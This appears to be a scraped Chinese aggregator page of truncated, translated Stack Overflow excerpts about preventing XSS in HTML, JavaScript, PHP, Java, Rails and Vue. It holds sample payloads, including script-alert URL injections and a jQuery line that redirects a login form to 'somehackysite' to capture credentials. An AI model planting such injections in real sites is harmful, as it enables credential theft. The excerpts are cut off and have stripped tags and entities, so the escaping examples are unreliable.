草庐IT

html - 避免使用像 <pre> 这样的 HTML 标签的 XSS

我有一个简单的网页,它获取查询项并将它们制作到页面中。示例网址:http://quir.li/player.html?media=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D0VqTwnAuHws页面然后在页面的某处显示URL:http://www.youtube.com/watch?v=0VqTwnAuHws我觉得这会使页面容易受到XSS攻击,以防页面加载的URL包含类似于http://quir.li/player.html?media=alert('test')我发现,将URL呈现为标签没有帮助。是否有一个简单的解决方案,比如一个HTML标

javascript - div contenteditable,XSS

我目前有一个简单的工作,但是,这是我的问题。目前,用户可以通过插入来创建持久性XSS。进入div,我绝对不想要。但是,我目前解决这个问题的想法是:只允许a和img标签使用文本区域(这不是个好主意,因为那样会让用户复制和粘贴图像)你们有什么建议? 最佳答案 您必须记住,要防止xss,您必须在服务器端执行此操作。如果您的富文本编辑器(例如YUI或tinyMCE)有一些javascript来防止输入脚本标签,那不会阻止我检查您的httppost请求,查看您正在使用的变量名称,然后使用firefox海报将我喜欢的任何字符串发送到您的服务器以

javascript - <img> 的 XSS 上的数据 URI 是否可被利用?

看完这篇文章我没有一个明确的答案:http://palizine.plynt.com/issues/2010Oct/bypass-xss-filters/浏览器会解释中的文本/html数据URI负载吗?src作为文档,其中标签执行了吗?如果不是,那么在第三方HTML中允许数据URI是否安全?针对此用例,浏览器级别存在哪些安全机制? 最佳答案 MSDNdocumentation说IE没有:Forsecurityreasons,dataURIsarerestrictedtodownloadedresources.DataURIscann

php - 用户输入的带有 Javascript 的 HTML 显示给其他人但不是 HTML 转义的 XSS 示例

我是一名PHP开发人员,我希望提高我网站的安全性。据我了解,以下是影响Web应用程序的两种主要类型的漏洞:SQL注入(inject)跨站攻击可以使用准备好的语句修复SQL注入(inject)-很简单。但我还是不太明白XSS——下面是XSS的例子吗?...充满用户制作内容的页面在顶部(全站范围)有一个登录表单。用户对页面的输入未经过HTML转义。用户将以下内容(例如评论)发布到页面...Areallynicecomment$(document).ready(function(){$('#login_form').attr('action','http://somehackysite.co

java - HTML-Entity 转义以防止 XSS

我有一些用户输入。在我的代码中,我确保对以下符号进行转义:&->&<>->>OWASP声明有更多字符需要转义。对于属性,我做了另一种转义:&->&"->"这确保所有属性都包含在"中。这使我对我的html属性有把握,但对HTML本身没有把握。我想知道我的转义是否足够。我读过thispost,但我仍然不确定我的担忧。(JavaScript使用OWASP-Library转义) 最佳答案 我也使用OWASP(ESAPI)库,为不同类型的显示转义字符串,使用:Stringhtml=ESAPI.encode

javascript - 为了保护它免受 XSS 攻击,对内联 javascript 对象进行编码的正确方法是什么?

事实证明以下看起来像有效的javascript,但不是:json={test:"alert('hello');"};相同的文本,当通过ajaxapi返回JSON时按预期工作。但是,当在线呈现时会导致基本的XSS问题。给定一个任意正确的JSON字符串,我需要在服务器端做什么才能使其安全地进行内联渲染?编辑理想情况下,我希望修复程序也适用于以下字符串:json={test:"alert('hello');"};意思是,我不知道我的底层库是如何编码/的char,它可能已经选择对其进行编码,也可能没有。(所以它可能是一个正则表达式修复更健壮) 最佳答案

javascript - URL 上的 HTML &lt;script&gt; 片段是否可以用于纯客户端应用程序中的 XSS?

背景假设我有以下网页:document.write('querystring='+location.search.substr(1));我在这样的URL上打开它:http://completely-secure-site/?alert('fsecurity')在所有尝试过的浏览器(Chrome57、Firefox52和Safari10)中,结果是:querystring=%3Cscript%3Ealert(%27fsecurity%27)%3C/script%3E因为尖括号是notvalidURLcharacters它们似乎在进入JS运行时之前就被浏览器自动编码了。我的假设这让我相信使

javascript - XSS 攻击和样式属性

已知的样式属性XSS攻击如下:或者所有例子I'veseen使用表达式或url功能-基本上像这样的功能需要“(”和“)”。我正在考虑以下过滤样式标签的方法,我会使用以下(大致)语法检查它们:identifier:[a-zA-Z_][a-zA-Z0-9\-]*number:[0-9]+string:'[a-zA-Z_0-9]*'value:identifier|number|string|number+"(em|px)"|number+"%"entry:identifier":"value(\svalue)*style:(entry;)*所以基本上我允许具有数值或非常有限的字符串值的ASC

html - 防止语言环境文件中的 HTML 字符实体被 Rails3 xss 保护破坏

我们正在构建一个应用程序,这是我们第一次使用Rails3,我们必须从一开始就构建I18n。作为完美主义者,我们希望在我们的View中使用真正的排版:破折号、弯引号、省略号等。这意味着在我们的locales/xx.yml文件中我们有两个选择:内联使用真正的UTF-8字符。应该可以,但很难打字,并且吓到我了仍然顽皮的软件统一编码的东西。使用HTML字符实体(’—ETC)。更容易打字,并且可能更兼容行为不端的软件。我宁愿选择第二个选项,但是Rails3中的自动转义使得这个问题成为问题,因为YAML中的&符号本身会自动转换为字符实体,导致浏览器中“可见”&8217;s.显然,这可以通过在字符串

关于xss攻击解决方案

1.介绍:前端安全系列(一):如何防止XSS攻击?2.遇见的问题情况一:后端直接返回带有样式的字符串,使用v-html会受到xss的攻击:原理:Vue中的v-html指令用以更新元素的innerHTML,其内容按普通HTML插入,不会作为Vue模板进行编译,容易受到xss攻击xss攻击检验的方式:text:''解决方式:方法一:使用xss插件https://jsxss.com/zh/options.html(npm)根据白名单过滤HTML(防止XSS攻击)https://blog.csdn.net/lingxiaoxi_ling/article/details/105851736(详细理解版)